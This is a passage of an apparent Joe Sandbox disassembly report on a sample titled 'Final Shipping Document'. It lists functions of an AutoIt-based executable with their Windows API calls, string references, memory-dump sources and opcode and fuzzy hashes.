                                                            • Instruction ID: cfa5176d2bbb5b593207d0392f45fb870b97d01f7c2784c3d8146737b76cc508
                                                            • Opcode Fuzzy Hash: 192a17871c7fef428afafb6d11f707949065668db80bae8b5ba85f6f27a8dd0f
                                                            • Instruction Fuzzy Hash: D8118F71120248ABEB224F64DC84BAB3B6AEB05374F504724F975A71E0C771DE919B50
                                                            Function 00C06C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • CharUpperBuffW.USER32(?,?,?), ref: 00C06CB6
                                                            • _wcslen.LIBCMT ref: 00C06CC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$BuffCharUpper
                                                            • String ID: STOP
                                                            • API String ID: 1256254125-2411985666
                                                            • Opcode ID: c9d6fec1bd8e287e72d9030ccefbc6da1886df53135bbf84d1457e114be23ac8
                                                            • Instruction ID: 5bff93f2684dfd0b375782f5e4ce7977bcdfe2bced1647412741f179903a47f5
                                                            • Opcode Fuzzy Hash: c9d6fec1bd8e287e72d9030ccefbc6da1886df53135bbf84d1457e114be23ac8
                                                            • Instruction Fuzzy Hash: AE01D232A146368BDB20AFFDDC81ABF77F5EB61710B100529E862971D0EB31DA60C650
                                                            Function 00C01CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C03CCA
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C01D4C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            • Opcode ID: f7370b6b4b3f0e7381a4c0ec9ed2d2c038cb3578f7c182f881e50727d872d727
                                                            • Instruction ID: 061ec5e997d9d1d7b9f20a900aae17b42b19778aae81aa6607840c1fc3d1dc49
                                                            • Opcode Fuzzy Hash: f7370b6b4b3f0e7381a4c0ec9ed2d2c038cb3578f7c182f881e50727d872d727
                                                            • Instruction Fuzzy Hash: 3701D471605228ABCB19EBA4CC51DFEB3A8EB473A0B180619FC32672C1EA305908D760
                                                            Function 00C01BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C03CCA
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C01C46
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            • Opcode ID: 1ad00919a984cb54e9b217c676556d30a560769f7dcb75b6919ed9f88783d3e7
                                                            • Instruction ID: f1ffbc064279bb18975db05bbdc6b1c308cfab6e3af4a49180d5f0c1df5c0162
                                                            • Opcode Fuzzy Hash: 1ad00919a984cb54e9b217c676556d30a560769f7dcb75b6919ed9f88783d3e7
                                                            • Instruction Fuzzy Hash: 7C01A77568510467DB18EB90C952AFFB7E8DB52380F140019B816772C1EA24DF48D6B1
                                                            Function 00C01C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C03CCA
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C01CC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            • Opcode ID: f11682c51633324d01dea431ad177a0f281957e53a6d91d5c7a4b02e54df79cc
                                                            • Instruction ID: a5e7d2cf3045f26952dc37a8d28546ea72473b91310dc4ea65cdf479de039b12
                                                            • Opcode Fuzzy Hash: f11682c51633324d01dea431ad177a0f281957e53a6d91d5c7a4b02e54df79cc
                                                            • Instruction Fuzzy Hash: BD018675695128A7EF14EBA5CA52AFEB7EC9B12380F180015BC12B32C1EA65DF08D671
                                                            Function 00C2747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: 3, 3, 16, 1
                                                            • API String ID: 176396367-3042988571
                                                            • Opcode ID: 7647b379bdf81c8e697a12c3ca45a3963484305817183a91d74d873492be5428
                                                            • Instruction ID: c7b9243e2adfc6af99938ebea4e0ee49202cef8efdca019843c726be3936bd17
                                                            • Opcode Fuzzy Hash: 7647b379bdf81c8e697a12c3ca45a3963484305817183a91d74d873492be5428
                                                            • Instruction Fuzzy Hash: 3FE02B026043301492313279BCC1EBF56C9CFC5750710193FF981C2266EBE48F9193A0
                                                            Function 00C00B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C00B23
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 2030045667-4017498283
                                                            • Opcode ID: 4819051df4b1ddf03a7c50dfa7eb9a30cd9a6f464e7c020b8c8037aec432ede2
                                                            • Instruction ID: 6b7efd2867d24e7e0fc66eb5d9d9009adb9a2651acf4ae5d659d6d10c8588070
                                                            • Opcode Fuzzy Hash: 4819051df4b1ddf03a7c50dfa7eb9a30cd9a6f464e7c020b8c8037aec432ede2
                                                            • Instruction Fuzzy Hash: 84E0483125431927D21436547C43FED7BC49F05B61F21047AFB58655C38BD1655047A9
                                                            Function 00BC0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BBF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BC0D71,?,?,?,00BA100A), ref: 00BBF7CE
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00BA100A), ref: 00BC0D75
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BA100A), ref: 00BC0D84
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BC0D7F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 55579361-631824599
                                                            • Opcode ID: 541eec3c3950a83c81ee5518417edf0fe9e4b95f159b90501e4ec7371066d90f
                                                            • Instruction ID: 3f3d939859c9e541355aa851f0ef6552f2f7acc597836e14a7594ce26eb2f39e
                                                            • Opcode Fuzzy Hash: 541eec3c3950a83c81ee5518417edf0fe9e4b95f159b90501e4ec7371066d90f
                                                            • Instruction Fuzzy Hash: CDE06DB02203118BD730AFBDE84475A7BE0AB00740F0089BDE896C6661DBF5E4448BA1
                                                            Function 00BFD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LocalTime
                                                            • String ID: %.3d$X64
                                                            • API String ID: 481472006-1077770165
                                                            • Opcode ID: 501e193ee9940360151444d70f1f187a586631cd98d19956c7087a0082a23585
                                                            • Instruction ID: 39d7f991d3fa1c72ab7a9e2ec73536ded05fc7f78a6081a77cf8b06611b30a76
                                                            • Opcode Fuzzy Hash: 501e193ee9940360151444d70f1f187a586631cd98d19956c7087a0082a23585
                                                            • Instruction Fuzzy Hash: B7D0127180810DEACB5097D0CCC59FEB3FDAB08301F5084E2FA06A3040E624C50C6BA1
                                                            Function 00C32356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C3236C
                                                            • PostMessageW.USER32(00000000), ref: 00C32373
                                                              • Part of subcall function 00C0E97B: Sleep.KERNEL32 ref: 00C0E9F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 5108869078f9d821c55c8537865b52da60160ed0a42f64802545de3b3327d572
                                                            • Instruction ID: b9a5f651eb69dffafe87c400f04e90e2724db9ab1dfbe699f25054df89c3ee5a
                                                            • Opcode Fuzzy Hash: 5108869078f9d821c55c8537865b52da60160ed0a42f64802545de3b3327d572
                                                            • Instruction Fuzzy Hash: 5BD0C9323D53107AE664A771AC8FFCE76149B05B10F0049167745BA1D0C9A0A841DB54
                                                            Function 00C32322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C3232C
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C3233F
                                                              • Part of subcall function 00C0E97B: Sleep.KERNEL32 ref: 00C0E9F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 1a78efdd52cefcc43d6ac2f82a909c1db27113e250340b4ce72f5ef73e865d0d
                                                            • Instruction ID: 9ce6da295f598b66a6f4c871d70598bb01ab8ef8654c614993856eb377c0622f
                                                            • Opcode Fuzzy Hash: 1a78efdd52cefcc43d6ac2f82a909c1db27113e250340b4ce72f5ef73e865d0d
                                                            • Instruction Fuzzy Hash: 6FD0C9363A4310B6E664A771AC8FFCE7A149B00B10F0049167745BA1D0C9A0A841DB54